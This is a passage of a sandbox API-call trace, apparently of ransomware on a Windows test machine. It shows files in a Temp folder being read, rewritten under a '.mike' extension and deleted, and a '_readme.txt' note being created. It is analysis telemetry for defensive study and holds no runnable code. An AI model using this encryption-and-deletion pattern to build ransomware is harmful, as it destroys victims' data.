hFile=0x280, lpBuffer=0x21d4270*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21d4270*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0145.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0145.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0145.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.554] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0145.556] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", lpFilePart=0x0) returned 0x42 [0145.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.557] SetFilePointer (in: hFile=0x280, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0145.558] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", lpFilePart=0x0) returned 0x42 [0145.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.560] SetFilePointer (in: hFile=0x280, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0145.561] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", lpFilePart=0x0) returned 0x42 [0145.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0145.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0145.564] WriteFile (in: hFile=0x280, lpBuffer=0x21fc394*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21fc394*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0145.564] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", lpFilePart=0x0) returned 0x42 [0145.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0145.564] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5vj8k5to.swf.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x200ad4a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x200ad4a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x200ad4a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6780)) returned 1 [0145.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0145.564] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", lpFilePart=0x0) returned 0x3d [0145.565] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike", lpFilePart=0x0) returned 0x42 [0145.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0145.565] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5vj8k5to.swf.mike"), fInfoLevelId=0x0, lpFileInformation=0x21fda3c | out: lpFileInformation=0x21fda3c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x200ad4a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x200ad4a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x200ad4a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6780)) returned 1 [0145.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0145.565] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", lpFilePart=0x0) returned 0x3d [0145.565] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", dwFileAttributes=0x80) returned 1 [0145.565] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", lpFilePart=0x0) returned 0x3d [0145.565] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5vj8k5to.swf")) returned 1 [0145.566] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", lpFilePart=0x0) returned 0x3d [0145.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0145.567] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5vj8k5to.swf"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0145.567] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5vj8K5tO.swf", lpFilePart=0x0) returned 0x3d [0145.567] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0145.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0145.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x280 [0145.568] GetFileType (hFile=0x280) returned 0x1 [0145.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0145.568] GetFileType (hFile=0x280) returned 0x1 [0145.568] WriteFile (in: hFile=0x280, lpBuffer=0x21ff644*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x21ff644*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0145.569] CloseHandle (hObject=0x280) returned 1 [0145.569] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8LHQLxa5GYmKMLFZJxu.gif", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8LHQLxa5GYmKMLFZJxu.gif", lpFilePart=0x0) returned 0x48 [0145.569] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.569] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.569] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0145.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0145.569] GetFileType (hFile=0x280) returned 0x1 [0145.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0145.569] GetFileType (hFile=0x280) returned 0x1 [0145.569] CloseHandle (hObject=0x280) returned 1 [0145.570] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.570] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.570] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0145.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0145.570] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0145.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0145.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0145.570] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3"), fInfoLevelId=0x0, lpFileInformation=0x22032c0 | out: lpFileInformation=0x22032c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5436aaa0, ftCreationTime.dwHighDateTime=0x1d4d173, ftLastAccessTime.dwLowDateTime=0xe0c54240, ftLastAccessTime.dwHighDateTime=0x1d4c969, ftLastWriteTime.dwLowDateTime=0xe0c54240, ftLastWriteTime.dwHighDateTime=0x1d4c969, nFileSizeHigh=0x0, nFileSizeLow=0x51c9)) returned 1 [0145.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0145.570] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0145.570] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3"), fInfoLevelId=0x0, lpFileInformation=0x22035c8 | out: lpFileInformation=0x22035c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5436aaa0, ftCreationTime.dwHighDateTime=0x1d4d173, ftLastAccessTime.dwLowDateTime=0xe0c54240, ftLastAccessTime.dwHighDateTime=0x1d4c969, ftLastWriteTime.dwLowDateTime=0xe0c54240, ftLastWriteTime.dwHighDateTime=0x1d4c969, nFileSizeHigh=0x0, nFileSizeLow=0x51c9)) returned 1 [0145.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0145.570] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.570] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", lpFilePart=0x0) returned 0x45 [0145.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0145.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0145.571] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.571] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.571] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.571] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", lpFilePart=0x0) returned 0x45 [0145.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0145.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0145.571] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", lpFilePart=0x0) returned 0x45 [0145.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.571] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0145.572] GetFileType (hFile=0x280) returned 0x1 [0145.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.572] GetFileType (hFile=0x280) returned 0x1 [0145.572] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0145.572] WriteFile (in: hFile=0x280, lpBuffer=0x22043a0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22043a0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0145.573] CloseHandle (hObject=0x280) returned 1 [0145.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0145.573] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3"), fInfoLevelId=0x0, lpFileInformation=0x2203ec0 | out: lpFileInformation=0x2203ec0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5436aaa0, ftCreationTime.dwHighDateTime=0x1d4d173, ftLastAccessTime.dwLowDateTime=0xe0c54240, ftLastAccessTime.dwHighDateTime=0x1d4c969, ftLastWriteTime.dwLowDateTime=0xe0c54240, ftLastWriteTime.dwHighDateTime=0x1d4c969, nFileSizeHigh=0x0, nFileSizeLow=0x51c9)) returned 1 [0145.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0145.573] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.573] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0145.573] GetFileType (hFile=0x280) returned 0x1 [0145.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.573] GetFileType (hFile=0x280) returned 0x1 [0145.573] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0145.574] ReadFile (in: hFile=0x280, lpBuffer=0x22054c4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22054c4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0145.574] CloseHandle (hObject=0x280) returned 1 [0145.575] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", lpFilePart=0x0) returned 0x45 [0145.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.575] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0145.575] GetFileType (hFile=0x280) returned 0x1 [0145.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.575] GetFileType (hFile=0x280) returned 0x1 [0145.575] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0145.575] WriteFile (in: hFile=0x280, lpBuffer=0x220fa2c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x220fa2c*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0145.576] CloseHandle (hObject=0x280) returned 1 [0145.576] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0145.576] GetFileType (hFile=0x280) returned 0x1 [0145.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.576] GetFileType (hFile=0x280) returned 0x1 [0145.576] SetFilePointer (in: hFile=0x280, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0145.576] ReadFile (in: hFile=0x280, lpBuffer=0x221247c, nNumberOfBytesToRead=0x2800, 